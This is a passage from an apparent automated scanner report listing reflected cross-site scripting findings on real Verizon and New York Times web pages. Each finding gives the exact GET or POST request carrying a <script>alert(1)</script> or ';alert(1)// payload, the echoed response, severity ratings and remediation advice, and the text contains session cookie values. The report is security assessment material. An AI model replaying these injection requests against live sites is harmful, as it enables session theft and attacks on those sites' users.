Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 04:33:06 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en
Set-cookie: JSESSIONID=10F13E78F8F1BFD28FD11CC47A9B73F2;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfczHtZ%2BAy3w%2BTueY4fVpztSF3kaGYDYjqoA%3D%40AAJTSwAKLTk4OTk4MTI1MgACU0kAAjQwAAJTMQACczI%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfczHtZ%2BAy3w%2BTueY4fVpztSF3kaGYDYjqoA%3D%40AAJTSwAKLTk4OTk4MTI1MgACU0kAAjQwAAJTMQACczI%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=s2;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=s2;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: GLOBALID=NHKqyrZfBxaF8aqhVrBfjNzRQ1JacqGnNxRdcGM3oZQ33zbfNy%252BSQKdh5BlaAk%252BC;Domain=.verizonwireless.com;Expires=Sun, 20-Nov-2011 04:33:07 GMT;Path=/
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17b3d6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 14913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<input type="hidden" name="goto" value="https://ebillpay.verizonwireless.com:443/vzw/accountholder/account/maint-features.do8db67"><script>alert(1)</script>6ce20bd7cf4" />
...[SNIP]...

2.364. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholder/account/maint-features.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58d4e"><script>alert(1)</script>00e77950275 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /vzw/accountholder/account/maint-features.do?58d4e"><script>alert(1)</script>00e77950275=1 HTTP/1.1
Host: ebillpay.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 04:27:35 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en
Set-cookie: JSESSIONID=F50A807C6131DC24CF7EA78C98456C01;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfcxtG3gwXLNaxaqoqVrooocFEOKLb%2Bp7nHQ%3D%40AAJTSwAKLTU1MDc4MzQxNwACU0kAAjcwAAJTMQACcGU%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfcxtG3gwXLNaxaqoqVrooocFEOKLb%2Bp7nHQ%3D%40AAJTSwAKLTU1MDc4MzQxNwACU0kAAjcwAAJTMQACcGU%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=pe;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=pe;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: GLOBALID=cqwhkZCdf9syRHrW2GlAS4Tfa6iyeBKbq0ws3kgLCpXkcaZpTMxIFO6FrRDUIZKl;Domain=.verizonwireless.com;Expires=Sun, 20-Nov-2011 04:27:35 GMT;Path=/
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 14937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<input type="hidden" name="goto" value="https://ebillpay.verizonwireless.com:443/vzw/accountholder/account/maint-features.do?58d4e"><script>alert(1)</script>00e77950275=1" />
...[SNIP]...

2.365. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955c9"><script>alert(1)</script>bcf97c01ba9c875f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vzw/955c9"><script>alert(1)</script>bcf97c01ba9c875f2/script%3Ec38e61d6c8d/account/maint-features.do?renderableItem=%2Fshow%2F5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:05:49 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=89C5CCA5CE12A6C07A1489AA71945931;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfcxzdG%2B2Tmzw3YF2O3dw0AvIS9VvXFzKjA8%3D%40AAJTSwALLTE0ODIxNTU5NjQAAlNJAAI3MAACUzEAAnRo%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfcxzdG%2B2Tmzw3YF2O3dw0AvIS9VvXFzKjA8%3D%40AAJTSwALLTE0ODIxNTU5NjQAAlNJAAI3MAACUzEAAnRo%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=th;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=th;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<input type="hidden" name="goto" value="https://ebillpay.verizonwireless.com:443/vzw/955c9"><script>alert(1)</script>bcf97c01ba9c875f2/script>
...[SNIP]...

2.366. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1d50c(a)795eeb802f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C1d50c(a)795eeb802f8/script%3Ec38e61d6c8d/account/maint-features.do HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000
Content-Length: 26

renderableItem=%2Fshow%2F5

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:06:05 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=776A76AED05F466C29AD617C70002352;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfczrqsNiCnUTkuzgBEYRFw9hpCGc%2BHhz154%3D%40AAJTSwAJMzY0MTkyNjA2AAJTSQACNzAAAlMxAAJvNA%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfczrqsNiCnUTkuzgBEYRFw9hpCGc%2BHhz154%3D%40AAJTSwAJMzY0MTkyNjA2AAJTSQACNzAAAlMxAAJvNA%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=o4;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=o4;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<1d50c(a)795eeb802f8/script>
...[SNIP]...

2.367. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 117f9<script>alert(1)</script>3e884278793dc6d52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d117f9<script>alert(1)</script>3e884278793dc6d52/account/maint-features.do?renderableItem=%2Fshow%2F5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:06:43 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=1DEC6BD535227D50623EACFB8F7E9D14;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfcxJrDa5EDrvwcoGyeITdqq%2FeQjZLepWlzE%3D%40AAJTSwAKMjEzNTQ2ODg0NgACU0kAAjcwAAJTMQACc2E%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfcxJrDa5EDrvwcoGyeITdqq%2FeQjZLepWlzE%3D%40AAJTSwAKMjEzNTQ2ODg0NgACU0kAAjcwAAJTMQACc2E%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=sa;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=sa;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
</script>c38e61d6c8d117f9<script>alert(1)</script>3e884278793dc6d52/account/maint-features.do?renderableItem=%2Fshow%2F5" />
...[SNIP]...

2.368. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c490b(a)462151465b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/c490b(a)462151465b0/account/maint-features.do HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000
Content-Length: 26

renderableItem=%2Fshow%2F5

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:06:38 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=DB7AE11D0683B1F394DA99512F2CB595;Path=/
Set-cookie: acProd=AQIC5wM2LY4SfczJzMgm7m85n7tMmF%2Fj21U0Q08ZapwUkkI%3D%40AAJTSwAKLTQ2NDYxMzMwMwACU0kAAjcwAAJTMQACbzI%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4SfczJzMgm7m85n7tMmF%2Fj21U0Q08ZapwUkkI%3D%40AAJTSwAKLTQ2NDYxMzMwMwACU0kAAjcwAAJTMQACbzI%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=o2;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=o2;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 14923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
</c490b(a)462151465b0/account/maint-features.do" />
...[SNIP]...

2.369. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ea37<script>alert(1)</script>7353666c57764c0be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account2ea37<script>alert(1)</script>7353666c57764c0be/maint-features.do?renderableItem=%2Fshow%2F5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:07:02 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=99103FCD2F0FAB41BF312CA0890D5D74;Path=/
Set-cookie: acProd=AQIC5wM2LY4Sfcw1y3gD%2BTeaMmHTgC73yfhK8eVYT2XrUts%3D%40AAJTSwAKMTkyOTcxMTg5MQACU0kAAjcwAAJTMQACbzQ%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4Sfcw1y3gD%2BTeaMmHTgC73yfhK8eVYT2XrUts%3D%40AAJTSwAKMTkyOTcxMTg5MQACU0kAAjcwAAJTMQACbzQ%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=o4;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=o4;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
</script>c38e61d6c8d/account2ea37<script>alert(1)</script>7353666c57764c0be/maint-features.do?renderableItem=%2Fshow%2F5" />
...[SNIP]...

2.370. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 95525<script>alert(1)</script>77ab86eb44a68071d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do95525<script>alert(1)</script>77ab86eb44a68071d?renderableItem=%2Fshow%2F5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ebillpay.verizonwireless.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GLOBALID=Pvbfe%252BDx4uFoyNU%252F13blWyzmFSrs3%252BFXvaK2itxahX9okKM3L2nevgZyFVBxwEaw; NSC_fcjmmqbz_xfc_mcwt=44acff2f79eb; NSC_fcjmmqbz_hwt=ec20d6a30000

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 21 Nov 2010 22:07:22 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en-US
Set-cookie: JSESSIONID=7E81258A2EBBF263F33222C4F74A45C1;Path=/
Set-cookie: acProd=AQIC5wM2LY4Sfczau1GXqLb619D5CDZ%2F%2BdNXN9Ws5doUHyQ%3D%40AAJTSwAJLTE2MTM4NDM4AAJTSQACNzAAAlMxAAJ0aA%3D%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4Sfczau1GXqLb619D5CDZ%2F%2BdNXN9Ws5doUHyQ%3D%40AAJTSwAJLTE2MTM4NDM4AAJTSQACNzAAAlMxAAJ0aA%3D%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=th;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=th;Domain=.vzwcorp.com;Path=/;Secure
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 15275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
</script>c38e61d6c8d/account/maint-features.do95525<script>alert(1)</script>77ab86eb44a68071d?renderableItem=%2Fshow%2F5" />
...[SNIP]...

2.371. http://economix.blogs.nytimes.com/2010/11/19/big-companies-hiring-small-companies-arent-gallup-finds/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://economix.blogs.nytimes.com
Path:   /2010/11/19/big-companies-hiring-small-companies-arent-gallup-finds/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f2e"><script>alert(1)</script>f1d827b2d70 was submitted in the src parameter. This input was echoed as 20f2e\"><script>alert(1)</script>f1d827b2d70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/big-companies-hiring-small-companies-arent-gallup-finds/?src=twr20f2e"><script>alert(1)</script>f1d827b2d70 HTTP/1.1
Host: economix.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:33:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://economix.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
,SponLink2&query=qstring&keywords=Economics;Economy;Economics+Policy;Economics+Reports;Business;bureau-of-labor-statistics;business-employment-dynamics-survey;employment;gallup;small-businesses&src=twr20f2e\"><script>alert(1)</script>f1d827b2d70">
...[SNIP]...

2.372. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea0c'%3balert(1)//5fb68b88c27 was submitted in the serviceId parameter. This input was echoed as 1ea0c';alert(1)//5fb68b88c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
